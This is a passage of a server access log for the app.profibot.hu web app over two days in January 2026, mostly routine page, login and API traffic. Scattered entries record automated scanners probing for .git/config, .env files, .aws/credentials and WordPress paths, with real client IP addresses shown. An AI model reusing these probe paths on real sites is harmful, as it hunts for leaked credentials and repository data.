(KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://app.profibot.hu" +[21/Jan/2026:06:35:11 +0000] - 200 200 - GET https app.profibot.hu "/" [Client 37.76.46.45] [Length 3352] [Gzip 2.92] [Sent-to 192.168.100.43] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "-" +[21/Jan/2026:06:35:11 +0000] - 404 404 - GET https app.profibot.hu "/favicon.ico" [Client 37.76.46.45] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "https://app.profibot.hu/" +[21/Jan/2026:06:35:12 +0000] - 200 200 - GET https app.profibot.hu "/" [Client 66.249.81.228] [Length 3352] [Gzip 2.92] [Sent-to 192.168.100.43] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Mobile Safari/537.36 (compatible; Google-Read-Aloud; +https://support.google.com/webmasters/answer/1061943)" "-" +[21/Jan/2026:06:35:12 +0000] - 200 200 - GET https app.profibot.hu "/" [Client 66.102.9.202] [Length 3352] [Gzip 2.92] [Sent-to 192.168.100.43] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Mobile Safari/537.36 (compatible; Google-Read-Aloud; +https://support.google.com/webmasters/answer/1061943)" "-" +[21/Jan/2026:06:35:13 +0000] - 200 200 - GET https app.profibot.hu "/" [Client 66.249.83.106] [Length 3352] [Gzip 2.92] [Sent-to 192.168.100.43] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Mobile Safari/537.36 (compatible; Google-Read-Aloud; +https://support.google.com/webmasters/answer/1061943)" "-" +[21/Jan/2026:07:21:40 +0000] - 404 404 - GET https app.profibot.hu "/.git/config" [Client 45.148.10.238] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (X11; Linux i686; rv:12.0) Gecko/20100101 Firefox/12.0" "-" +[21/Jan/2026:07:39:08 +0000] - 200 200 - GET http app.profibot.hu "/" [Client 34.142.243.79] [Length 3352] [Gzip 2.92] [Sent-to 192.168.100.43] "Mozilla/5.0 (Linux; Android 12) Chrome/111.0 Mobile Safari/537.36" "-" +[21/Jan/2026:07:39:11 +0000] - 404 404 - GET http app.profibot.hu "/wordpress/" [Client 34.142.243.79] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/120.0 Safari/537.36" "-" +[21/Jan/2026:10:52:46 +0000] - 200 200 - GET https app.profibot.hu "/" [Client 84.1.26.27] [Length 3352] [Gzip 2.92] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "-" +[21/Jan/2026:10:52:47 +0000] - 404 404 - GET https app.profibot.hu "/favicon.ico" [Client 84.1.26.27] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://app.profibot.hu/" +[21/Jan/2026:10:53:01 +0000] - 200 200 - POST https app.profibot.hu "/api/auth/login" [Client 84.1.26.27] [Length 160] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://app.profibot.hu/" +[21/Jan/2026:10:53:01 +0000] - 200 200 - GET https app.profibot.hu "/api/my_vehicles" [Client 84.1.26.27] [Length 164] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://app.profibot.hu/" +[21/Jan/2026:10:53:01 +0000] - 200 200 - GET https app.profibot.hu "/api/meta/vehicle-hierarchy" [Client 84.1.26.27] [Length 845] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://app.profibot.hu/" +[21/Jan/2026:10:53:01 +0000] - 200 200 - GET https app.profibot.hu "/api/meta/cost-types" [Client 84.1.26.27] [Length 1416] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://app.profibot.hu/" +[21/Jan/2026:11:48:17 +0000] - 404 404 - GET https app.profibot.hu "/.git/config" [Client 45.148.10.238] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Linux; U; Android 9; zh-cn; PCCM00 Build/PKQ1.190223.001) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/70.0.3538.80 Mobile Safari/537.36 OppoBrowser/20.6.0.0.2beta" "-" +[21/Jan/2026:12:08:23 +0000] - 404 404 - GET https app.profibot.hu "/.git/config" [Client 46.105.92.110] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0" "-" +[21/Jan/2026:13:42:08 +0000] - 404 404 - GET https app.profibot.hu "/.git/config" [Client 54.162.106.120] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Debian; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36" "-" +[21/Jan/2026:13:51:42 +0000] - 200 200 - GET http app.profibot.hu "/" [Client 34.44.221.131] [Length 3352] [Gzip 2.92] [Sent-to 192.168.100.43] "Mozilla/5.0 (compatible; CMS-Checker/1.0; +https://example.com)" "-" +[21/Jan/2026:16:28:11 +0000] - 200 200 - GET http app.profibot.hu "/" [Client 34.42.147.238] [Length 3352] [Gzip 2.92] [Sent-to 192.168.100.43] "Mozilla/5.0 (compatible; CMS-Checker/1.0; +https://example.com)" "-" +[21/Jan/2026:17:05:07 +0000] - 200 200 - GET https app.profibot.hu "/" [Client 37.76.43.146] [Length 3352] [Gzip 2.92] [Sent-to 192.168.100.43] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "-" +[21/Jan/2026:17:05:07 +0000] - 404 404 - GET https app.profibot.hu "/favicon.ico" [Client 37.76.43.146] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "https://app.profibot.hu/" +[21/Jan/2026:17:05:25 +0000] - 200 200 - POST https app.profibot.hu "/api/auth/login" [Client 37.76.43.146] [Length 160] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "https://app.profibot.hu/" +[21/Jan/2026:17:05:25 +0000] - 200 200 - GET https app.profibot.hu "/api/meta/vehicle-hierarchy" [Client 37.76.43.146] [Length 845] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "https://app.profibot.hu/" +[21/Jan/2026:17:05:25 +0000] - 200 200 - GET https app.profibot.hu "/api/meta/cost-types" [Client 37.76.43.146] [Length 1416] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "https://app.profibot.hu/" +[21/Jan/2026:17:05:25 +0000] - 200 200 - GET https app.profibot.hu "/api/my_vehicles" [Client 37.76.43.146] [Length 164] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "https://app.profibot.hu/" +[21/Jan/2026:17:06:03 +0000] - 404 404 - POST https app.profibot.hu "/api/register" [Client 37.76.43.146] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "https://app.profibot.hu/" +[21/Jan/2026:17:06:07 +0000] - 404 404 - POST https app.profibot.hu "/api/register" [Client 37.76.43.146] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "https://app.profibot.hu/" +[21/Jan/2026:17:06:11 +0000] - 404 404 - POST https app.profibot.hu "/api/register" [Client 37.76.43.146] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "https://app.profibot.hu/" +[21/Jan/2026:17:06:12 +0000] - 404 404 - POST https app.profibot.hu "/api/register" [Client 37.76.43.146] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "https://app.profibot.hu/" +[21/Jan/2026:17:06:28 +0000] - 404 404 - POST https app.profibot.hu "/api/register" [Client 37.76.43.146] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "https://app.profibot.hu/" +[21/Jan/2026:17:06:35 +0000] - 404 404 - POST https app.profibot.hu "/api/register" [Client 37.76.43.146] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "https://app.profibot.hu/" +[21/Jan/2026:17:06:45 +0000] - 404 404 - POST https app.profibot.hu "/api/register" [Client 37.76.43.146] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "https://app.profibot.hu/" +[21/Jan/2026:18:14:27 +0000] - 404 404 - GET https app.profibot.hu "/.git/config" [Client 185.196.8.135] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_2_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" "https://www.notion.so/" +[21/Jan/2026:20:05:14 +0000] - - 499 - GET https app.profibot.hu "/" [Client 195.178.110.68] [Length 0] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0" "-" +[21/Jan/2026:20:36:51 +0000] - 502 502 - GET https app.profibot.hu "/" [Client 195.178.110.155] [Length 154] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0" "-" +[21/Jan/2026:22:38:54 +0000] - 502 502 - GET http app.profibot.hu "/.git/HEAD" [Client 45.130.203.190] [Length 154] [Gzip -] [Sent-to 192.168.100.43] "Python-urllib/3.10" "-" +[21/Jan/2026:22:44:54 +0000] - 200 200 - GET https app.profibot.hu "/" [Client 149.57.180.186] [Length 85] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (X11; Linux i686; rv:109.0) Gecko/20100101 Firefox/120.0" "-" +[22/Jan/2026:03:01:45 +0000] - 200 200 - GET https app.profibot.hu "/" [Client 149.57.180.38] [Length 85] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (X11; Linux i686; rv:109.0) Gecko/20100101 Firefox/120.0" "-" +[22/Jan/2026:07:34:31 +0000] - 404 404 - HEAD https app.profibot.hu "/.env" [Client 104.244.74.39] [Length 0] [Gzip -] [Sent-to 192.168.100.43] "Python/3.13 aiohttp/3.11.18" "-" +[22/Jan/2026:07:34:31 +0000] - 404 404 - HEAD https app.profibot.hu "/.env.local" [Client 104.244.74.39] [Length 0] [Gzip -] [Sent-to 192.168.100.43] "Python/3.13 aiohttp/3.11.18" "-" +[22/Jan/2026:07:34:31 +0000] - 404 404 - HEAD https app.profibot.hu "/.env.prod" [Client 104.244.74.39] [Length 0] [Gzip -] [Sent-to 192.168.100.43] "Python/3.13 aiohttp/3.11.18" "-" +[22/Jan/2026:07:34:31 +0000] - 404 404 - HEAD https app.profibot.hu "/.env.dev" [Client 104.244.74.39] [Length 0] [Gzip -] [Sent-to 192.168.100.43] "Python/3.13 aiohttp/3.11.18" "-" +[22/Jan/2026:08:11:20 +0000] - 404 404 - GET https app.profibot.hu "/.aws/credentials" [Client 45.148.10.238] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (X11; Linux x86_64; rv:15.0) Gecko/20120724 Debian Iceweasel/15.02" "-" +[22/Jan/2026:08:11:20 +0000] - 404 404 - GET https app.profibot.hu "/.env" [Client 45.148.10.238] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.145 Safari/537.36 Vivaldi/2.6.1566.49" "-" +[22/Jan/2026:08:11:20 +0000] - 404 404 - GET https app.profibot.hu "/aws.env" [Client 45.148.10.238] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Linux; Android 9; MI 8 Build/PKQ1.180729.001; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/67.0.3396.87 XWEB/882 MMWEBSDK/190506 Mobile Safari/537.36 MMWEBID/409 MicroMessenger/7.0.6.1460(0x27000634) Process/tools NetType/WIFI Language/zh_CN" "-" +[22/Jan/2026:11:59:51 +0000] - 200 200 - GET https app.profibot.hu "/" [Client 34.221.21.250] [Length 85] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (X11; Linux i686; rv:124.0) Gecko/20100101 Firefox/124.0" "-" +[22/Jan/2026:12:38:44 +0000] - 200 200 - GET https app.profibot.hu "/" [Client 84.1.26.27] [Length 85] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "-" +[22/Jan/2026:12:38:44 +0000] - 404 404 - GET https app.profibot.hu "/favicon.ico" [Client 84.1.26.27] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://app.profibot.hu/" +[22/Jan/2026:12:38:50 +0000] - 200 200 - GET https app.profibot.hu "/docs" [Client 84.1.26.27] [Length 526] [Gzip 1.92] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "-" +[22/Jan/2026:12:38:51 +0000] - 200 200 - GET https app.profibot.hu "/api/v1/openapi.json" [Client 84.1.26.27] [Length 15787] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://app.profibot.hu/docs" +[22/Jan/2026:17:04:19 +0000] - 200 200 - GET http app.profibot.hu "/" [Client 34.122.150.104] [Length 85] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (compatible; CMS-Checker/1.0; +https://example.com)" "-" +[22/Jan/2026:17:37:46 +0000] - 200 200 - GET http app.profibot.hu "/" [Client 208.84.101.102] [Length 85] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[22/Jan/2026:17:37:46 +0000] - 200 200 - GET http app.profibot.hu "/" [Client 208.84.101.102] [Length 85] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[22/Jan/2026:17:37:46 +0000] - 404 404 - GET http app.profibot.hu "/wp-includes/wlwmanifest.xml" [Client 208.84.101.102] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[22/Jan/2026:17:37:46 +0000] - 404 404 - GET http app.profibot.hu "/xmlrpc.php?rsd" [Client 208.84.101.102] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[22/Jan/2026:17:37:46 +0000] - 200 200 - GET http app.profibot.hu "/" [Client 208.84.101.102] [Length 85] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[22/Jan/2026:17:37:46 +0000] - 404 404 - GET http app.profibot.hu "/blog/wp-includes/wlwmanifest.xml" [Client 208.84.101.102] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[22/Jan/2026:17:37:46 +0000] - 404 404 - GET http app.profibot.hu "/web/wp-includes/wlwmanifest.xml" [Client 208.84.101.102] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[22/Jan/2026:17:37:47 +0000] - 404 404 - GET http app.profibot.hu "/wordpress/wp-includes/wlwmanifest.xml" [Client 208.84.101.102] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[22/Jan/2026:17:37:47 +0000] - 404 404 - GET http app.profibot.hu "/website/wp-includes/wlwmanifest.xml" [Client 208.84.101.102] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[22/Jan/2026:17:37:47 +0000] - 404 404 - GET http app.profibot.hu "/wp/wp-includes/wlwmanifest.xml" [Client 208.84.101.102] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[22/Jan/2026:17:37:47 +0000] - 404 404 - GET http app.profibot.hu "/news/wp-includes/wlwmanifest.xml" [Client 208.84.101.102] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[22/Jan/2026:17:37:47 +0000] - 404 404 - GET http app.profibot.hu "/2018/wp-includes/wlwmanifest.xml" [Client 208.84.101.102] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[22/Jan/2026:17:37:47 +0000] - 404 404 - GET http app.profibot.hu "/2019/wp-includes/wlwmanifest.xml" [Client 208.84.101.102] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[22/Jan/2026:17:37:47 +0000] - 404 404 - GET http app.profibot.hu "/shop/wp-includes/wlwmanifest.xml" [Client 208.84.101.102] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[22/Jan/2026:17:37:48 +0000] - 404 404 - GET http app.profibot.hu "/wp1/wp-includes/wlwmanifest.xml" [Client 208.84.101.102] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[22/Jan/2026:17:37:48 +0000] - 404 404 - GET http app.profibot.hu "/test/wp-includes/wlwmanifest.xml" [Client 208.84.101.102] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[22/Jan/2026:17:37:48 +0000] - 404 404 - GET http app.profibot.hu "/media/wp-includes/wlwmanifest.xml" [Client 208.84.101.102] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[22/Jan/2026:17:37:48 +0000] - 404 404 - GET http app.profibot.hu "/wp2/wp-includes/wlwmanifest.xml" [Client 208.84.101.102] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[22/Jan/2026:17:37:48 +0000] - 404 404 - GET http app.profibot.hu "/site/wp-includes/wlwmanifest.xml" [Client 208.84.101.102] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[22/Jan/2026:17:37:48 +0000] - 404 404 - GET http app.profibot.hu "/cms/wp-includes/wlwmanifest.xml" [Client 208.84.101.102] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[22/Jan/2026:17:37:48 +0000] - 404 404 - GET http app.profibot.hu "/sito/wp-includes/wlwmanifest.xml" [Client 208.84.101.102] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[22/Jan/2026:18:42:29 +0000] - - 499 - GET https app.profibot.hu "/" [Client 37.76.11.122] [Length 0] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "-" +[22/Jan/2026:18:43:34 +0000] - - 499 - GET https app.profibot.hu "/" [Client 37.76.11.122] [Length 0] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "-" +[22/Jan/2026:18:43:40 +0000] - - 499 - GET https app.profibot.hu "/" [Client 37.76.11.122] [Length 0] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "-" +[22/Jan/2026:19:01:59 +0000] - 504 504 - GET https app.profibot.hu "/" [Client 37.76.12.67] [Length 566] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "-" +[22/Jan/2026:19:04:57 +0000] - 404 404 - GET https app.profibot.hu "/favicon.ico" [Client 37.76.12.67] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "https://app.profibot.hu/" +[22/Jan/2026:19:04:58 +0000] - 200 200 - GET https app.profibot.hu "/" [Client 37.76.12.67] [Length 85] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "-" +[22/Jan/2026:19:05:05 +0000] - 200 200 - GET https app.profibot.hu "/" [Client 37.76.12.67] [Length 85] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "-" +[22/Jan/2026:19:05:10 +0000] - 200 200 - GET https app.profibot.hu "/docs" [Client 37.76.12.67] [Length 526] [Gzip 1.92] [Sent-to 192.168.100.43] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "-" +[22/Jan/2026:19:05:10 +0000] - 200 200 - GET https app.profibot.hu "/api/v1/openapi.json" [Client 37.76.12.67] [Length 15787] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "https://app.profibot.hu/docs" +[22/Jan/2026:19:05:11 +0000] - 200 200 - GET https app.profibot.hu "/docs" [Client 66.249.81.228] [Length 526] [Gzip 1.92] [Sent-to 192.168.100.43] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Mobile Safari/537.36 (compatible; Google-Read-Aloud; +https://support.google.com/webmasters/answer/1061943)" "-" +[22/Jan/2026:19:05:12 +0000] - 200 200 - GET https app.profibot.hu "/docs" [Client 74.125.215.165] [Length 526] [Gzip 1.92] [Sent-to 192.168.100.43] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Mobile Safari/537.36 (compatible; Google-Read-Aloud; +https://support.google.com/webmasters/answer/1061943)" "-" +[22/Jan/2026:19:05:12 +0000] - 200 200 - GET https app.profibot.hu "/docs" [Client 74.125.215.166] [Length 526] [Gzip 1.92] [Sent-to 192.168.100.43] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Mobile Safari/537.36 (compatible; Google-Read-Aloud; +https://support.google.com/webmasters/answer/1061943)" "-" +[22/Jan/2026:19:05:13 +0000] - 200 200 - GET https app.profibot.hu "/api/v1/openapi.json" [Client 74.125.215.165] [Length 15787] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Mobile Safari/537.36 (compatible; Google-Read-Aloud; +https://support.google.com/webmasters/answer/1061943)" "https://app.profibot.hu/docs" +[22/Jan/2026:19:40:23 +0000] - 200 200 - GET https app.profibot.hu "/" [Client 84.254.106.197] [Length 85] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36" "-" +[22/Jan/2026:19:40:23 +0000] - 404 404 - GET https app.profibot.hu "/css/support_parent.css" [Client 84.254.106.197] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36" "-" +[22/Jan/2026:19:40:23 +0000] - 404 404 - GET https app.profibot.hu "/js/twint_ch.js" [Client 84.254.106.197] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36" "-" +[22/Jan/2026:19:40:23 +0000] - 404 404 - GET https app.profibot.hu "/js/lkk_ch.js" [Client 84.254.106.197] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36" "-" +[22/Jan/2026:22:44:37 +0000] - 200 200 - GET https app.profibot.hu "/" [Client 37.76.47.183] [Length 85] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "-" +[22/Jan/2026:22:44:44 +0000] - 200 200 